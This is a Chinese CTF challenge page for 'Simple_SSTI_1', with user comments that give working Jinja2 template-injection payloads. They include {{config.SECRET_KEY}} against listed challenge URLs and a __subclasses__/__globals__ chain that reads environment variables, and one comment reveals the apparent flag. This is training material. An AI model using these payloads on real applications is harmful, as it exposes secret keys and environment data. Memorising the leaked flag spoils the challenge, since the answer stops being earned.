Simple_SSTI_1WEB 未解决

分数: 5 金币: 2
题目作者: valecalida
一  血: dotast
一血奖励: 2金币
解  决: 28825
提  示:
描  述:
Simple_SSTI_1
评论
litt 3月前

flag={{config}}都直接爆出flag了

回复 1

y1 4月前

http://171.80.2.169:15802/?flag={{config.SECRET_KEY}}

回复 1

xshzgjshpy 5月前

http://171.80.2.169:10541/?flag={{config['SECRET_KEY']}}

回复 0

cfggfbfxdgbb 5月前

?flag={{''.__class__.__base__.__subclasses__()[127].__init__.__globals__['environ']}}

回复 0

LeoCHAn 8月前

flag{********}

回复 0

merrymu 10月前

模板注入(Server-Side Template Injection,SSTI)是一种通过将恶意代码注入服务器端模板来执行非授权操作的安全漏洞‌,主要成因是开发者未对用户输入进行有效过滤,导致攻击者可利用模板引擎特性实现远程代码执行、敏感信息泄露等高危操作。‌‌‌‌ 基本探测:输入{{2*2}},若返回4则存在漏洞。‌‌

回复 0

HK1ng 1年前

还真是简单模板注入,甚至不需要利用方法,首先传参{{7*7}}验证是否执行了语句,看到页面出现49,就知道这里存在模板注入,然后查看一下配置文件,就发现了flag。{{config}}

回复 1

看writeup刷题 1年前

咋SECRET_KEY还必须大写

回复 0

Wang_Micro 1年前

?flag={{config.SECRET_KEY}} flag{4c1f57d8ba21815847e7d477c3c86b81}

回复 0

超爱西西鸭 1年前

/?flag={{config.SECRET_KEY}}

回复 1

WriteUp

image
valecalida

5 金币

评分(50)

解题动态

c&y 攻破了该题 23小时前
天天1 攻破了该题 1天前
粉红色的-毛 攻破了该题 1天前
就我一个人 攻破了该题 1天前
3024769318 攻破了该题 2天前
fu11dreamer 攻破了该题 2天前
shengood 攻破了该题 5天前
ndzdb 攻破了该题 5天前
学了就费 攻破了该题 5天前
2333m 攻破了该题 7天前
fish12138 攻破了该题 8天前
hauss 攻破了该题 9天前
xxhacker 攻破了该题 9天前
Xxx6 攻破了该题 10天前
记得开心一点 攻破了该题 10天前
kuku1024 攻破了该题 11天前
echk 攻破了该题 11天前
orr_ 攻破了该题 12天前
蟹不揉 攻破了该题 13天前
大雪深埋 攻破了该题 13天前
问题反馈